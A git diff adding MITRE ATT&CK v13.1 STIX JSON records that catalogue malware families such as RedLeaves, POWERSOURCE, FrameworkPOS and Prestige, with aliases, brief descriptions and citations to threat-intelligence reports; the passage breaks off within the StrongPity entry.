b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5.json @@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--4cad74f2-6147-43a6-947f-0f2064b8cf0f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-23T15:14:18.594Z", + "name": "RedLeaves", + "description": "[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_aliases": [ + "RedLeaves", + "BUGJUICE" + ], + "type": "malware", + "id": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0153", + "external_id": "S0153" + }, + { + "source_name": "RedLeaves", + "description": "(Citation: PWC Cloud Hopper Technical Annex April 2017)" + }, + { + "source_name": "BUGJUICE", + "description": "Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named BUGJUICE by FireEye is likely the same as the malware RedLeaves. (Citation: FireEye APT10 April 2017) (Citation: Twitter Nick Carr APT10)" + }, + { + "source_name": "Twitter Nick Carr APT10", + "description": "Carr, N.. (2017, April 6). Retrieved June 29, 2017.", + "url": "https://twitter.com/ItsReallyNick/status/850105140589633536" + }, + { + "source_name": "FireEye APT10 April 2017", + "description": "FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html" + }, + { + "source_name": "PWC Cloud Hopper Technical Annex April 2017", + "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.", + "url": "https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234.json new file mode 100644 index 0000000000000000000000000000000000000000..764a945ae66df3c17f253fee84728440679f9a24 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--b445a2e8-fe92-4b2a-8170-b885b370bfdb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234", + "type": "malware", + "created": "2017-05-31T21:33:16.315Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0133", + "external_id": "S0133" + }, + { + "source_name": "Softpedia MinerC", + "description": "Cimpanu, C.. (2016, September 9). Cryptocurrency Mining Malware Discovered Targeting Seagate NAS Hard Drives. Retrieved October 12, 2016.", + "url": "http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Miner-C", + "description": "[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17e919aa-4a49-445c-b103-dbb8df9e7351.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17e919aa-4a49-445c-b103-dbb8df9e7351.json new file mode 100644 index 0000000000000000000000000000000000000000..9ecb0cca1a44a2fc3b446d453aa7254f13154565 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17e919aa-4a49-445c-b103-dbb8df9e7351.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--bdb0703f-8ba6-4be5-91f6-0612837e6013", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "POWERSOURCE", + "DNSMessenger" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--17e919aa-4a49-445c-b103-dbb8df9e7351", + "created": "2017-05-31T21:33:24.739Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0145", + "url": "https://attack.mitre.org/software/S0145" + }, + { + "source_name": "POWERSOURCE", + "description": "(Citation: FireEye FIN7 March 2017)" + }, + { + "source_name": "DNSMessenger", + "description": "Based on similar descriptions of functionality, it appears S0145, as named by FireEye, is the same as the first stages of a backdoor named DNSMessenger by Cisco's Talos Intelligence Group. However, FireEye appears to break DNSMessenger into two parts: S0145 and S0146. (Citation: Cisco DNSMessenger March 2017) (Citation: FireEye FIN7 March 2017)" + }, + { + "source_name": "Cisco DNSMessenger March 2017", + "url": "http://blog.talosintelligence.com/2017/03/dnsmessenger.html", + "description": "Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017." + }, + { + "source_name": "FireEye FIN7 March 2017", + "url": "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html", + "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)", + "modified": "2022-07-20T20:06:44.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "POWERSOURCE", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1.json new file mode 100644 index 0000000000000000000000000000000000000000..9751aba1aa094e437ea370ed571efe78b1064b45 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--8030007e-0d54-45aa-a7f8-c670c44a3859", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Felismus" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0171", + "external_id": "S0171" + }, + { + "source_name": "Felismus", + "description": "(Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)" + }, + { + "url": "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.", + "source_name": "Symantec Sowbug Nov 2017" + }, + { + "url": "https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware", + "description": "Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.", + "source_name": "Forcepoint Felismus Mar 2017" + } + ], + "modified": "2020-03-30T18:52:30.568Z", + "name": "Felismus", + "description": "[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--199463de-d9be-46d6-bb41-07234c1dd5a6.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--199463de-d9be-46d6-bb41-07234c1dd5a6.json new file mode 100644 index 0000000000000000000000000000000000000000..edb1ce9eea5ff08d3d9bc46344b2a199b74c0802 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--199463de-d9be-46d6-bb41-07234c1dd5a6.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b951a858-d51c-4d5d-8c19-7f8afaa387e9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "GeminiDuke" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--199463de-d9be-46d6-bb41-07234c1dd5a6", + "type": "malware", + "created": "2017-05-31T21:32:36.177Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0049", + "external_id": "S0049" + }, + { + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "source_name": "F-Secure The Dukes" + } + ], + "modified": "2020-03-30T16:43:20.186Z", + "name": "GeminiDuke", + "description": "[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8.json new file mode 100644 index 0000000000000000000000000000000000000000..ffce858eedfcb92aa61bc670dbd73fe4f984e25b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--b6b2aef6-4153-4d34-a828-4201a65ee3a3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:24:06.264Z", + "name": "CARROTBAT", + "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356).(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "CARROTBAT" + ], + "type": "malware", + "id": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8", + "created": "2020-06-02T14:11:40.581Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0462", + "external_id": "S0462" + }, + { + "source_name": "Unit 42 CARROTBAT November 2018", + "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.", + "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/" + }, + { + "source_name": "Unit 42 CARROTBAT January 2020", + "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.", + "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cc934e4-b01d-4543-a011-b988dfc1a458.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cc934e4-b01d-4543-a011-b988dfc1a458.json new file mode 100644 index 0000000000000000000000000000000000000000..e377664a075a123a0d3574706a765fdf71b68796 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cc934e4-b01d-4543-a011-b988dfc1a458.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--4bd4b784-244a-42a4-aae1-b57f94e8088c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Matryoshka" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--1cc934e4-b01d-4543-a011-b988dfc1a458", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0167", + "external_id": "S0167" + }, + { + "source_name": "Matryoshka", + "description": "(Citation: ClearSky Wilted Tulip July 2017)" + }, + { + "source_name": "ClearSky Wilted Tulip July 2017", + "description": "ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + }, + { + "source_name": "CopyKittens Nov 2015", + "description": "Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.", + "url": "https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf" + } + ], + "modified": "2021-04-23T20:13:32.050Z", + "name": "Matryoshka", + "description": "[Matryoshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)", + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cdbbcab-903a-414d-8eb0-439a97343737.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cdbbcab-903a-414d-8eb0-439a97343737.json new file mode 100644 index 0000000000000000000000000000000000000000..5bfe5aba0b9ddba2db550d9d3c566e7c4ade6ab4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cdbbcab-903a-414d-8eb0-439a97343737.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--a8a4ea5a-95ec-4772-b159-4f67894b3320", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_aliases": [ + "FrameworkPOS", + "Trinity" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "type": "malware", + "created": "2020-09-08T14:55:46.094Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0503", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0503" + }, + { + "source_name": "Trinity", + "description": "(Citation: SentinelOne FrameworkPOS September 2019)" + }, + { + "source_name": "SentinelOne FrameworkPOS September 2019", + "url": "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/", + "description": "Kremez, V. (2019, September 19). FIN6 \u201cFrameworkPOS\u201d: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020." + } + ], + "modified": "2020-10-19T19:44:15.357Z", + "name": "FrameworkPOS", + "description": "[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from sytems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d1fce2f-0db5-402b-9843-4278a0694637.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d1fce2f-0db5-402b-9843-4278a0694637.json new file mode 100644 index 0000000000000000000000000000000000000000..fd70fa2d25d30f963378ca709f2d1995ea57c427 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d1fce2f-0db5-402b-9843-4278a0694637.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--23d0eb7f-2ee0-46fb-a438-229e739f59ca", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "GravityRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--1d1fce2f-0db5-402b-9843-4278a0694637", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0237", + "external_id": "S0237" + }, + { + "source_name": "GravityRAT", + "description": "(Citation: Talos GravityRAT)" + }, + { + "source_name": "Talos GravityRAT", + "description": "Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.", + "url": "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" + } + ], + "modified": "2020-03-30T20:44:34.524Z", + "name": "GravityRAT", + "description": "[GravityRAT](https://attack.mitre.org/software/S0237) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are \"TheMartian\" and \"The Invincible.\" According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. (Citation: Talos GravityRAT)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d808f62-cf63-4063-9727-ff6132514c22.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d808f62-cf63-4063-9727-ff6132514c22.json new file mode 100644 index 0000000000000000000000000000000000000000..d8e31309f2c8c1fe7eda7328188e7733e63b2aeb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d808f62-cf63-4063-9727-ff6132514c22.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--e347a1fd-9f00-462b-b218-2f0660114892", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Wes Hurd" + ], + "x_mitre_aliases": [ + "WEBC2" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--1d808f62-cf63-4063-9727-ff6132514c22", + "type": "malware", + "created": "2017-05-31T21:33:06.433Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0109", + "external_id": "S0109" + }, + { + "source_name": "WEBC2", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Mandiant APT1 Appendix", + "description": "Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + } + ], + "modified": "2020-08-25T21:23:24.223Z", + "name": "WEBC2", + "description": "[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)", + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1da748a5-875d-4212-9222-b4c23ab861be.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1da748a5-875d-4212-9222-b4c23ab861be.json new file mode 100644 index 0000000000000000000000000000000000000000..e87a550a8496e4ff580390475ba8f53f3d85c7e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1da748a5-875d-4212-9222-b4c23ab861be.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--6250614a-1fe2-4bdc-b225-f9a58a352bbb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-24T22:25:15.162Z", + "name": "Prestige", + "description": "[Prestige](https://attack.mitre.org/software/S1058) ransomware has been used by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.(Citation: Microsoft Prestige ransomware October 2022)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Mindaugas Gudzis, BT Security" + ], + "x_mitre_aliases": [ + "Prestige" + ], + "type": "malware", + "id": "malware--1da748a5-875d-4212-9222-b4c23ab861be", + "created": "2023-01-20T18:43:05.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1058", + "external_id": "S1058" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New \u201cPrestige\u201d ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8.json new file mode 100644 index 0000000000000000000000000000000000000000..740d42019bab199ce397f2dbf2c1893a05d5fbc7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--166f235c-a4ee-4f89-a7f6-9e41b50ae07c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Bankshot", + "Trojan Manuscript" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0239", + "external_id": "S0239" + }, + { + "source_name": "Bankshot", + "description": "(Citation: McAfee Bankshot)" + }, + { + "source_name": "Trojan Manuscript", + "description": "(Citation: McAfee Bankshot)" + }, + { + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/", + "description": "Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.", + "source_name": "McAfee Bankshot" + } + ], + "modified": "2020-03-30T20:41:17.223Z", + "name": "Bankshot", + "description": "[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--20945359-3b39-4542-85ef-08ecb4e1c174.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--20945359-3b39-4542-85ef-08ecb4e1c174.json new file mode 100644 index 0000000000000000000000000000000000000000..e80ae5d0bd342a602e608d6ac0352126d268c525 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--20945359-3b39-4542-85ef-08ecb4e1c174.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--4c36b855-e694-4bf1-8b8a-95629e56ddcf", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "StrongPity" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "type": "malware", + "created": 